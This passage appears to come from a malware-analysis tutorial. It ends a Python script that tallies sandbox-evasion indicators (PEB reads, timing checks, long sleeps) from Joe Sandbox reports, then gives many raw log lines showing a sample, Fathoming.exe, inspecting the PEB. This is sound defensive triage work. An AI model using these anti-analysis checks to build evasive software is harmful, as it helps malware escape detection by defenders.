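    """Classify one behaviour line.  Returns (process_name, event) or None."""
    text = line.strip()
    m = SOURCE_RE.match(text)
    if not m:
        return None
    proc = m.group("src").rsplit("\\", 1)[-1].lower()
    rest = text[m.end():]
    hit = PEB_RE.search(rest)
    if hit:
        return proc, {"kind": "peb_read", "fn": hit["fn"].upper(), "reg": hit["reg"]}
    hit = RDTSC_RE.search(rest)
    if hit:
        return proc, {"kind": "rdtsc", "fn": hit["fn"].upper()}
    hit = FINDFILE_RE.search(rest)
    if hit:
        return proc, {"kind": "file_enum", "fn": hit["fn"].upper()}
    hit = SLEEP_RE.search(rest)
    if hit:
        return proc, {"kind": "sleep", "value": int(hit["val"]), "threshold": int(hit["thr"])}
    hit = DELAY_RE.search(rest)
    if hit:
        return proc, {"kind": "delay", "ms": int(hit["ms"])}
    hit = COVERAGE_RE.search(rest)
    if hit:
        return proc, {"kind": "coverage", "pct": float(hit["pct"])}
    return proc, {"kind": "other"}


def _empty():
    return {"peb_reads": Counter(), "rdtsc": set(), "file_enum": set(),
            "long_sleeps": [], "infinite_delays": 0, "api_coverage": None}


def summarize(lines, sleep_threshold=30000):
    """Aggregate evasion indicators per process.  sleep_threshold is compared against
    the magnitude of each reported sleep, in the report's own units (30000 above)."""
    report = defaultdict(_empty)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, ev = parsed
        r = report[proc]
        kind = ev["kind"]
        if kind == "peb_read":
            r["peb_reads"][ev["fn"]] += 1
        elif kind == "rdtsc":
            r["rdtsc"].add(ev["fn"])
        elif kind == "file_enum":
            r["file_enum"].add(ev["fn"])
        elif kind == "sleep":
            # Joe Sandbox prints NT relative intervals as negative numbers;
            # only the magnitude matters for the threshold.
            if abs(ev["value"]) >= sleep_threshold:
                r["long_sleeps"].append(abs(ev["value"]))
        elif kind == "delay":
            if ev["ms"] >= INFINITE_DELAY_MS:
                r["infinite_delays"] += 1
            elif ev["ms"] >= sleep_threshold:
                r["long_sleeps"].append(ev["ms"])
        elif kind == "coverage":
            r["api_coverage"] = ev["pct"]
    return dict(report)


def evasion_tags(proc_summary, low_coverage_pct=1.0):
    """Translate one process's counters into triage tags (tag names are this example's)."""
    tags = []
    if proc_summary["rdtsc"]:
        tags.append("timing-check")
    if proc_summary["peb_reads"]:
        tags.append("peb-inspection")
    if proc_summary["long_sleeps"] or proc_summary["infinite_delays"]:
        tags.append("long-sleep")
    if proc_summary["file_enum"]:
        tags.append("file-enumeration")
    cov = proc_summary["api_coverage"]
    if cov is not None and cov < low_coverage_pct:
        tags.append("low-api-coverage")
    return tags


if __name__ == "__main__":
    for proc, s in sorted(summarize(SAMPLE_LINES.splitlines()).items()):
        print(f"{proc}: {evasion_tags(s)} peb_reads={sum(s['peb_reads'].values())} "
              f"top={s['peb_reads'].most_common(3)}")
```

      Feed the full text export of the section instead of SAMPLE_LINES and the per-function PEB counters show at a glance which routines in Fathoming.exe do the environment checks, while powershell.exe's entries reduce to the long wait.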
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h] (4 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B9C188 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B20185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B84180 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADA197 mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B101F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BB61E5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B5E1D0 mov eax/ecx, dword ptr fs:[00000030h] (5 hits: 4 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BA61C3 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B10124 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B8A118 mov eax/ecx, dword ptr fs:[00000030h] (4 hits: 3 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BA0115 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B8E10E mov eax/ecx, dword ptr fs:[00000030h] (10 hits: 6 eax, 4 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BB4164 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B78158 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B74144 mov eax/ecx, dword ptr fs:[00000030h] (5 hits: 4 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AE6154 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADC156 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BA60B8 mov eax/ecx, dword ptr fs:[00000030h] (2 hits: 1 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AD80A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B780A8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AE208A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B220F0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AE80E9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADA0E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B660E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADC0F0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B620DE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B76030 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADA020 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADC020 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B64000 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h] (8 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AFE016 mov eax, dword ptr fs:[00000030h] (4 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B0C073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B66050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AE2050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADE388 mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AD8397 mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B0438F mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h] (8 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B163FF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AFE3F0 mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B8E3DB mov eax/ecx, dword ptr fs:[00000030h] (4 hits: 3 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B843D4 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h] (6 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AE83C0 mov eax, dword ptr fs:[00000030h] (4 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B9C3CD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BB8324 mov eax/ecx, dword ptr fs:[00000030h] (4 hits: 3 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B00310 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B1A30B mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21ADC310 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B8437C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BAA352 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B88350 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B6035C mov eax/ecx, dword ptr fs:[00000030h] (6 hits: 5 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BB634F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h] (15 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AF02A0 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B762A0 mov eax/ecx, dword ptr fs:[00000030h] (6 hits: 5 eax, 1 ecx)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B60283 mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B1E284 mov eax, dword ptr fs:[00000030h] (2 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AF02E1 mov eax, dword ptr fs:[00000030h] (3 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AEA2C3 mov eax, dword ptr fs:[00000030h] (5 hits)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21BB62D6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AD823B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21AD826B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4260 mov eax, dword ptr fs:[00000030h]8_2_21AE4260
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4260 mov eax, dword ptr fs:[00000030h]8_2_21AE4260
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4260 mov eax, dword ptr fs:[00000030h]8_2_21AE4260
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB625D mov eax, dword ptr fs:[00000030h]8_2_21BB625D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A250 mov eax, dword ptr fs:[00000030h]8_2_21B9A250
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A250 mov eax, dword ptr fs:[00000030h]8_2_21B9A250
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B68243 mov eax, dword ptr fs:[00000030h]8_2_21B68243
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B68243 mov ecx, dword ptr fs:[00000030h]8_2_21B68243
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE6259 mov eax, dword ptr fs:[00000030h]8_2_21AE6259
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA250 mov eax, dword ptr fs:[00000030h]8_2_21ADA250
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B045B1 mov eax, dword ptr fs:[00000030h]8_2_21B045B1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B045B1 mov eax, dword ptr fs:[00000030h]8_2_21B045B1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B605A7 mov eax, dword ptr fs:[00000030h]8_2_21B605A7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B605A7 mov eax, dword ptr fs:[00000030h]8_2_21B605A7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B605A7 mov eax, dword ptr fs:[00000030h]8_2_21B605A7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE2582 mov eax, dword ptr fs:[00000030h]8_2_21AE2582
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE2582 mov ecx, dword ptr fs:[00000030h]8_2_21AE2582
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E59C mov eax, dword ptr fs:[00000030h]8_2_21B1E59C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B14588 mov eax, dword ptr fs:[00000030h]8_2_21B14588
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE25E0 mov eax, dword ptr fs:[00000030h]8_2_21AE25E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C5ED mov eax, dword ptr fs:[00000030h]8_2_21B1C5ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C5ED mov eax, dword ptr fs:[00000030h]8_2_21B1C5ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A5D0 mov eax, dword ptr fs:[00000030h]8_2_21B1A5D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A5D0 mov eax, dword ptr fs:[00000030h]8_2_21B1A5D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E5CF mov eax, dword ptr fs:[00000030h]8_2_21B1E5CF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E5CF mov eax, dword ptr fs:[00000030h]8_2_21B1E5CF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE65D0 mov eax, dword ptr fs:[00000030h]8_2_21AE65D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76500 mov eax, dword ptr fs:[00000030h]8_2_21B76500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1656A mov eax, dword ptr fs:[00000030h]8_2_21B1656A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1656A mov eax, dword ptr fs:[00000030h]8_2_21B1656A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1656A mov eax, dword ptr fs:[00000030h]8_2_21B1656A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8550 mov eax, dword ptr fs:[00000030h]8_2_21AE8550
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8550 mov eax, dword ptr fs:[00000030h]8_2_21AE8550
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B144B0 mov ecx, dword ptr fs:[00000030h]8_2_21B144B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE64AB mov eax, dword ptr fs:[00000030h]8_2_21AE64AB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6A4B0 mov eax, dword ptr fs:[00000030h]8_2_21B6A4B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A49A mov eax, dword ptr fs:[00000030h]8_2_21B9A49A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE04E5 mov ecx, dword ptr fs:[00000030h]8_2_21AE04E5
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A430 mov eax, dword ptr fs:[00000030h]8_2_21B1A430
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADC427 mov eax, dword ptr fs:[00000030h]8_2_21ADC427
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE420 mov eax, dword ptr fs:[00000030h]8_2_21ADE420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE420 mov eax, dword ptr fs:[00000030h]8_2_21ADE420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE420 mov eax, dword ptr fs:[00000030h]8_2_21ADE420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18402 mov eax, dword ptr fs:[00000030h]8_2_21B18402
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18402 mov eax, dword ptr fs:[00000030h]8_2_21B18402
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18402 mov eax, dword ptr fs:[00000030h]8_2_21B18402
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0A470 mov eax, dword ptr fs:[00000030h]8_2_21B0A470
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0A470 mov eax, dword ptr fs:[00000030h]8_2_21B0A470
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0A470 mov eax, dword ptr fs:[00000030h]8_2_21B0A470
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6C460 mov ecx, dword ptr fs:[00000030h]8_2_21B6C460
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0245A mov eax, dword ptr fs:[00000030h]8_2_21B0245A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A456 mov eax, dword ptr fs:[00000030h]8_2_21B9A456
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD645D mov eax, dword ptr fs:[00000030h]8_2_21AD645D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE07AF mov eax, dword ptr fs:[00000030h]8_2_21AE07AF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B947A0 mov eax, dword ptr fs:[00000030h]8_2_21B947A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8678E mov eax, dword ptr fs:[00000030h]8_2_21B8678E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE47FB mov eax, dword ptr fs:[00000030h]8_2_21AE47FB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE47FB mov eax, dword ptr fs:[00000030h]8_2_21AE47FB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E7E1 mov eax, dword ptr fs:[00000030h]8_2_21B6E7E1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B027ED mov eax, dword ptr fs:[00000030h]8_2_21B027ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B027ED mov eax, dword ptr fs:[00000030h]8_2_21B027ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B027ED mov eax, dword ptr fs:[00000030h]8_2_21B027ED
